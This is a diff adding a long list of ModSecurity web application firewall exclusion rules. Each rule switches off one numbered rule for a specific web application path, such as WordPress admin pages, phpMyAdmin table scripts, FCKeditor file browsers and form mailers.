+SecRule REQUEST_FILENAME "/includes/popup\.php" "phase:2,id:93928,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/cgiemail/testform\.txt" "phase:2,id:93929,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/doeditboard\.php" "phase:2,id:93930,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/item_processor\.php" "phase:2,id:93931,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/fckeditor/fckeditor/editor/filemanager/browser/default/browser\.html" "phase:2,id:93932,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/mod_shoutbox\.php" "phase:2,id:93933,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/options\.php" "phase:2,id:93934,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/options-general\.php" "phase:2,id:93935,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/app-modernbill-admin/configs\.php" "phase:2,id:93936,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/formmail\.pl" "phase:2,id:93937,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/formmail\.pl" "phase:2,id:93938,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mainsettings\.php" "phase:2,id:93939,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/site\.php" "phase:2,id:93940,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/ciadmin\.php" "phase:2,id:93941,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/category\.php" "phase:2,id:93942,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/newbbex/post\.php" "phase:2,id:93943,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/mb/index2\.cgi" "phase:2,id:93944,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cerberus/parser\.php" "phase:2,id:93945,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/expand\.php" "phase:2,id:93946,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/mastersettings\.php" "phase:2,id:93947,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manager/edit_template\.php" "phase:2,id:93948,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/clip/index\.php" "phase:2,id:93949,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/moduleinterface\.php" "phase:2,id:93950,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cpanel/savetype\.php" "phase:2,id:93951,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/basic_settings\.php" "phase:2,id:93952,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/site_setup\.php" "phase:2,id:93953,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shopadmin/core\.php" "phase:2,id:93954,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/system/index\.php" "phase:2,id:93955,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailer/truefm\.php" "phase:2,id:93956,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ummmanager\.cgi" "phase:2,id:93957,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/step6\.php" "phase:2,id:93958,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/homecounter\.php" "phase:2,id:93959,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/options\.php" "phase:2,id:93960,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/media/hochron\.html" "phase:2,id:93961,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settings/index\.php" "phase:2,id:93962,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cmspopouts/shortcuts\.php" "phase:2,id:93963,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manufacturers_edit\.php" "phase:2,id:93964,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/contactmanage\.php" "phase:2,id:93965,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/giftcert\.php" "phase:2,id:93966,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pages/news\.htm" "phase:2,id:93967,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bb-login\.php" "phase:2,id:93968,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adview\.php" "phase:2,id:93969,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajcart/cart\.php" "phase:2,id:93970,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/index\.php/install/-/configure" "phase:2,id:93971,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/store/zc_install/index\.php" "phase:2,id:93972,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_config\.php" "phase:2,id:93973,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cutenews/index\.php" "phase:2,id:93974,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/data/nanoadmin\.php" "phase:2,id:93975,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/auctions/rsstml\.php" "phase:2,id:93976,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/util\.php" "phase:2,id:93977,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/egroupware/index\.php" "phase:2,id:93978,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/lclaccounts/setup/config\.php" "phase:2,id:93979,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/post_property\.php" "phase:2,id:93980,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/filemanager/browser/default/browser\.html" "phase:2,id:93981,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin\.mvc" "phase:2,id:93982,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/delivery/ck\.php" "phase:2,id:93983,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/proxy/index\.php" "phase:2,id:93984,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "^/imp/" "phase:2,id:93985,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "modules/mod_wowstatus/wowserverstatus\.php" "phase:2,id:93986,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ucp\.php" "phase:2,id:93987,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/app-modernbill-admin/configs\.php" "phase:2,id:93988,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sysadminarea\.php" "phase:2,id:93989,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/download\.php" "phase:2,id:93990,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/net2ftp_installer\.php" "phase:2,id:93991,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mediaplayer\.swf" "phase:2,id:93992,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:93993,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/piwik\.php" "phase:2,id:93994,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/file_edit\.php" "phase:2,id:93995,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugin-editor\.php" "phase:2,id:93996,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fplayer\.swf" "phase:2,id:93997,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailer/images\.php" "phase:2,id:93998,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailer/redir\.php" "phase:2,id:93999,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sqlpatch\.php" "phase:2,id:94000,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_select\.php" "phase:2,id:94001,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/cart\.cgi" "phase:2,id:94002,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:94003,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/writetosfdc\.php" "phase:2,id:94004,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/nmanage\.php" "phase:2,id:94005,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/login\.php" "phase:2,id:94006,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/amember/admin/email\.php" "phase:2,id:94007,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webinstall\.php" "phase:2,id:94008,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pap\.swf" "phase:2,id:94009,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fckeditor\.html" "phase:2,id:94010,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/timthumb\.php" "phase:2,id:94011,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpthumb\.php" "phase:2,id:94012,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpthumb/phpthumb\.php" "phase:2,id:94013,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upload\.php" "phase:2,id:94014,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/idevaffiliate/admin/setup\.php" "phase:2,id:94015,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/index\.php" "phase:2,id:94016,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_create\.php" "phase:2,id:94017,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_select\.php" "phase:2,id:94018,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_addfield\.php" "phase:2,id:94019,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_change\.php" "phase:2,id:94020,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpmyadmin/" "phase:2,id:94021,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/movieonline\.php" "phase:2,id:94022,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/listings/client\.php" "phase:2,id:94023,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/test_index\.php" "phase:2,id:94024,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/recommend\.cgi" "phase:2,id:94025,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/goodscounter\.php" "phase:2,id:94026,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fla_video\.swf" "phase:2,id:94027,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/admin_board\.php" "phase:2,id:94028,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/search_results\.php" "phase:2,id:94029,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/wordtube/lib/statistic\.php" "phase:2,id:94030,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/paadmin/categories\.php" "phase:2,id:94031,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/alt_clickmenu\.php" "phase:2,id:94032,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/get\.php" "phase:2,id:94033,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-ajax\.php" "phase:2,id:94034,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256,ctl:ruleRemovebyID=342259"
+
+SecRule REQUEST_FILENAME "/administrator/index\.php" "phase:2,id:94035,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/index2\.php" "phase:2,id:94036,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/req\.php" "phase:2,id:94037,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/news/news\.cgi" "phase:2,id:94038,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/themes\.php" "phase:2,id:94039,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit-item\.php" "phase:2,id:94040,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/removed\.php" "phase:2,id:94041,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ezgctrlpanel\.php" "phase:2,id:94042,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/magazine/index\.php" "phase:2,id:94043,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fckeditor/editor/filemanager/browser/default/browser\.html" "phase:2,id:94044,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/track\.php" "phase:2,id:94045,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/flashgallery\.php" "phase:2,id:94046,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/req\.php" "phase:2,id:94047,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/patch\.php" "phase:2,id:94048,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/etc/reality-info\.css" "phase:2,id:94049,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/alt_doc\.php" "phase:2,id:94050,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/product_modify\.php" "phase:2,id:94051,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fix\.swf" "phase:2,id:94052,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3/alt_mod_frameset\.php" "phase:2,id:94053,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cnf_config\.php" "phase:2,id:94054,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/classes/crop_image\.php" "phase:2,id:94055,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/members/create_listing\.php" "phase:2,id:94056,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livesupport/install/dbperform\.php" "phase:2,id:94057,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/st/out\.php" "phase:2,id:94058,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_sql\.php" "phase:2,id:94059,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/catch\.php" "phase:2,id:94060,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/languages\.php" "phase:2,id:94061,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/slideshow/admin/p\.php" "phase:2,id:94062,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/theme-editor\.php" "phase:2,id:94063,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/components/com_oziogallery/preview\.swf" "phase:2,id:94064,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fla_music\.swf" "phase:2,id:94065,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mickadmincp/user\.php" "phase:2,id:94066,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/tools\.php" "phase:2,id:94067,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/c0ntaktu3\.php" "phase:2,id:94068,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/formmail\.php" "phase:2,id:94069,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/free\.cgi" "phase:2,id:94070,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/wp-postratings/postratings-admin-ajax\.php" "phase:2,id:94071,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/search\.php" "phase:2,id:94072,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/online/index\.php" "phase:2,id:94073,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contenido/main\.php" "phase:2,id:94074,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imageresize\.php" "phase:2,id:94075,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/taguchitest\.php" "phase:2,id:94076,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/modcp/moderate\.php" "phase:2,id:94077,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/odp/index\.php" "phase:2,id:94078,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/yanner\.php" "phase:2,id:94079,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pluskernel/settings\.php" "phase:2,id:94080,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sql_error\.php" "phase:2,id:94081,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/login-register\.php" "phase:2,id:94082,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/lecture\.php" "phase:2,id:94083,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/response\.php" "phase:2,id:94084,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_css\.ph" "phase:2,id:94085,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/mod_oneononechat/phpfunctions\.php" "phase:2,id:94086,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sql/fileman2\.php" "phase:2,id:94087,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/simple-popup-images/popup\.php" "phase:2,id:94088,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/design/swapimages_onmousemove\.js" "phase:2,id:94089,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_image" "phase:2,id:94090,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/server\.php" "phase:2,id:94091,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/php/compress\.php" "phase:2,id:94092,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_replace\.php" "phase:2,id:94093,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "wp-content/themes/bobv2/dax\.swf" "phase:2,id:94094,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugin-install\.php" "phase:2,id:94095,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sitemap/index\.php" "phase:2,id:94096,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_row_action\.php" "phase:2,id:94097,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/www/delivery/lg\.php" "phase:2,id:94098,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiny_mce/themes/advanced/source_editor\.htm" "phase:2,id:94099,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/automediaembed_admin\.php" "phase:2,id:94100,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-comments-post\.php" "phase:2,id:94101,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/compose\.php" "phase:2,id:94102,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/database/admin\.pl" "phase:2,id:94103,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cynghrair/change\.php" "phase:2,id:94104,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm_noticies\.php" "phase:2,id:94105,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
